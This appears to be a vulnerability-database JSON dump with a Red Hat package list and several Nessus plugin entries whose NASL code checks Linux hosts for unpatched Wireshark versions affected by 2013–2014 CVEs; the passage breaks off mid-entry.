"packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "wireshark-debuginfo", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-debuginfo-1.8.10-7.el6_5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390", "packageName": "wireshark-devel", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-devel-1.8.10-7.el6_5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "wireshark", "packageVersion": "1.8.10-7.el6_5", "packageFilename": "wireshark-1.8.10-7.el6_5.i686.rpm", "operator": "lt"}], "_object_type": "robots.models.redhat.RedHatBulletin", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"]}

{"nessus": [{"lastseen": "2020-04-01T06:49:35", "bulletinFamily": "scanner", "description": "Updated wireshark packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nWireshark is a network protocol analyzer. It is used to capture and\nbrowse the traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2014-2281, CVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2013-6336,\nCVE-2013-6337, CVE-2013-6338, CVE-2013-6339, CVE-2013-6340,\nCVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. All running\ninstances of Wireshark must be restarted for the update to take\neffect.", "modified": "2020-04-02T00:00:00", "id": "CENTOS_RHSA-2014-0342.NASL", "href": "https://www.tenable.com/plugins/nessus/73277", "published": "2014-04-01T00:00:00", "title": "CentOS 6 : wireshark (CESA-2014:0342)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0342 and \n# CentOS Errata and Security Advisory 2014:0342 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73277);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2020/01/06\");\n\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\", \"CVE-2013-6340\", \"CVE-2013-7112\", \"CVE-2013-7114\", \"CVE-2014-2281\", \"CVE-2014-2283\", \"CVE-2014-2299\");\n script_bugtraq_id(63500, 63501, 63502, 63503, 63504, 64411, 64412, 66066, 66068, 66072);\n script_xref(name:\"RHSA\", value:\"2014:0342\");\n\n script_name(english:\"CentOS 6 : wireshark (CESA-2014:0342)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated wireshark packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nWireshark is a network protocol analyzer. It is used to capture and\nbrowse the traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2014-2281, CVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2013-6336,\nCVE-2013-6337, CVE-2013-6338, CVE-2013-6339, CVE-2013-6340,\nCVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. All running\ninstances of Wireshark must be restarted for the update to take\neffect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-March/020238.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?adf544c5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-2299\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark wiretap/mpeg.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:wireshark-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"wireshark-1.8.10-7.el6_5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"wireshark-devel-1.8.10-7.el6_5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"wireshark-gnome-1.8.10-7.el6_5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-devel / wireshark-gnome\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-18T02:47:16", "bulletinFamily": "scanner", "description": "Two flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2014-2281, CVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2013-6336,\nCVE-2013-6337, CVE-2013-6338, CVE-2013-6339, CVE-2013-6340,\nCVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll running instances of Wireshark must be restarted for the update to\ntake effect.", "modified": "2014-04-01T00:00:00", "id": "SL_20140331_WIRESHARK_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/73286", "published": "2014-04-01T00:00:00", "title": "Scientific Linux Security Update : wireshark on SL6.x i386/x86_64 (20140331)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73286);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/25\");\n\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\", \"CVE-2013-6340\", \"CVE-2013-7112\", \"CVE-2013-7114\", \"CVE-2014-2281\", \"CVE-2014-2283\", \"CVE-2014-2299\");\n\n script_name(english:\"Scientific Linux Security Update : wireshark on SL6.x i386/x86_64 (20140331)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2014-2281, CVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2013-6336,\nCVE-2013-6337, CVE-2013-6338, CVE-2013-6339, CVE-2013-6340,\nCVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll running instances of Wireshark must be restarted for the update to\ntake effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1403&L=scientific-linux-errata&T=0&P=2726\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?139337ea\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark wiretap/mpeg.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:wireshark-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:wireshark-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"wireshark-1.8.10-7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"wireshark-debuginfo-1.8.10-7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"wireshark-devel-1.8.10-7.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"wireshark-gnome-1.8.10-7.el6_5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-debuginfo / wireshark-devel / wireshark-gnome\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:22:29", "bulletinFamily": "scanner", "description": "Harden dumpcap capabilities\n\n - Ver. 1.10.3\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2013-11-08T00:00:00", "id": "FEDORA_2013-20829.NASL", "href": "https://www.tenable.com/plugins/nessus/70790", "published": "2013-11-08T00:00:00", "title": "Fedora 19 : wireshark-1.10.3-2.fc19 (2013-20829)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-20829.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70790);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\", \"CVE-2013-6340\");\n script_bugtraq_id(63500, 63501, 63502, 63503, 63504);\n script_xref(name:\"FEDORA\", value:\"2013-20829\");\n\n script_name(english:\"Fedora 19 : wireshark-1.10.3-2.fc19 (2013-20829)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Harden dumpcap capabilities\n\n - Ver. 1.10.3\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026534\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026538\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026539\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026540\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026541\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-November/120218.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9cb8c092\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"wireshark-1.10.3-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T01:09:30", "bulletinFamily": "scanner", "description": "Multiple vulnerabilities was found and corrected in Wireshark :\n\nThe ieee802154_map_rec function in epan/dissectors/packet-ieee802154.c\nin the IEEE 802.15.4 dissector in Wireshark 1.8.x before 1.8.11 and\n1.10.x before 1.10.3 uses an incorrect pointer chain, which allows\nremote attackers to cause a denial of service (application crash) via\na crafted packet (CVE-2013-6336).\n\nUnspecified vulnerability in the NBAP dissector in Wireshark 1.8.x\nbefore 1.8.11 and 1.10.x before 1.10.3 allows remote attackers to\ncause a denial of service (application crash) via a crafted packet\n(CVE-2013-6337).\n\nThe dissect_sip_common function in epan/dissectors/packet-sip.c in the\nSIP dissector in Wireshark 1.8.x before 1.8.11 and 1.10.x before\n1.10.3 does not properly initialize a data structure, which allows\nremote attackers to cause a denial of service (application crash) via\na crafted packet (CVE-2013-6338).\n\nThe dissect_openwire_type function in\nepan/dissectors/packet-openwire.c in the OpenWire dissector in\nWireshark 1.8.x before 1.8.11 and 1.10.x before 1.10.3 allows remote\nattackers to cause a denial of service (loop) via a crafted packet\n(CVE-2013-6339).\n\nepan/dissectors/packet-tcp.c in the TCP dissector in Wireshark 1.8.x\nbefore 1.8.11 and 1.10.x before 1.10.3 does not properly determine the\namount of remaining data, which allows remote attackers to cause a\ndenial of service (application crash) via a crafted packet\n(CVE-2013-6340).\n\nThis advisory provides the latest version of Wireshark (1.8.11) which\nis not vulnerable to these issues.", "modified": "2020-04-02T00:00:00", "id": "MANDRIVA_MDVSA-2013-279.NASL", "href": "https://www.tenable.com/plugins/nessus/71074", "published": "2013-11-25T00:00:00", "title": "Mandriva Linux Security Advisory : wireshark (MDVSA-2013:279)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:279. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71074);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/08/02 13:32:55\");\n\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\", \"CVE-2013-6340\");\n script_bugtraq_id(63500, 63501, 63502, 63503, 63504);\n script_xref(name:\"MDVSA\", value:\"2013:279\");\n\n script_name(english:\"Mandriva Linux Security Advisory : wireshark (MDVSA-2013:279)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities was found and corrected in Wireshark :\n\nThe ieee802154_map_rec function in epan/dissectors/packet-ieee802154.c\nin the IEEE 802.15.4 dissector in Wireshark 1.8.x before 1.8.11 and\n1.10.x before 1.10.3 uses an incorrect pointer chain, which allows\nremote attackers to cause a denial of service (application crash) via\na crafted packet (CVE-2013-6336).\n\nUnspecified vulnerability in the NBAP dissector in Wireshark 1.8.x\nbefore 1.8.11 and 1.10.x before 1.10.3 allows remote attackers to\ncause a denial of service (application crash) via a crafted packet\n(CVE-2013-6337).\n\nThe dissect_sip_common function in epan/dissectors/packet-sip.c in the\nSIP dissector in Wireshark 1.8.x before 1.8.11 and 1.10.x before\n1.10.3 does not properly initialize a data structure, which allows\nremote attackers to cause a denial of service (application crash) via\na crafted packet (CVE-2013-6338).\n\nThe dissect_openwire_type function in\nepan/dissectors/packet-openwire.c in the OpenWire dissector in\nWireshark 1.8.x before 1.8.11 and 1.10.x before 1.10.3 allows remote\nattackers to cause a denial of service (loop) via a crafted packet\n(CVE-2013-6339).\n\nepan/dissectors/packet-tcp.c in the TCP dissector in Wireshark 1.8.x\nbefore 1.8.11 and 1.10.x before 1.10.3 does not properly determine the\namount of remaining data, which allows remote attackers to cause a\ndenial of service (application crash) via a crafted packet\n(CVE-2013-6340).\n\nThis advisory provides the latest version of Wireshark (1.8.11) which\nis not vulnerable to these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2013-61.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2013-62.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2013-63.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2013-64.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2013-65.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dumpcap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wireshark2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:rawshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:wireshark-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"dumpcap-1.8.11-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64wireshark-devel-1.8.11-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64wireshark2-1.8.11-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"rawshark-1.8.11-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tshark-1.8.11-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"wireshark-1.8.11-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"wireshark-tools-1.8.11-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T03:22:25", "bulletinFamily": "scanner", "description": "The installed version of Wireshark 1.10.x is earlier than 1.10.3. It\nis, therefore, affected by denial of service vulnerabilities in the\nfollowing dissectors :\n\n - IEEE 802.15.4 (Bug #9139)\n - NBAP (Bug #9168)\n - SIP (Bug #9228)\n - ActiveMQ OpenWire (Bug #9248)\n - TCP (Bug #9263)", "modified": 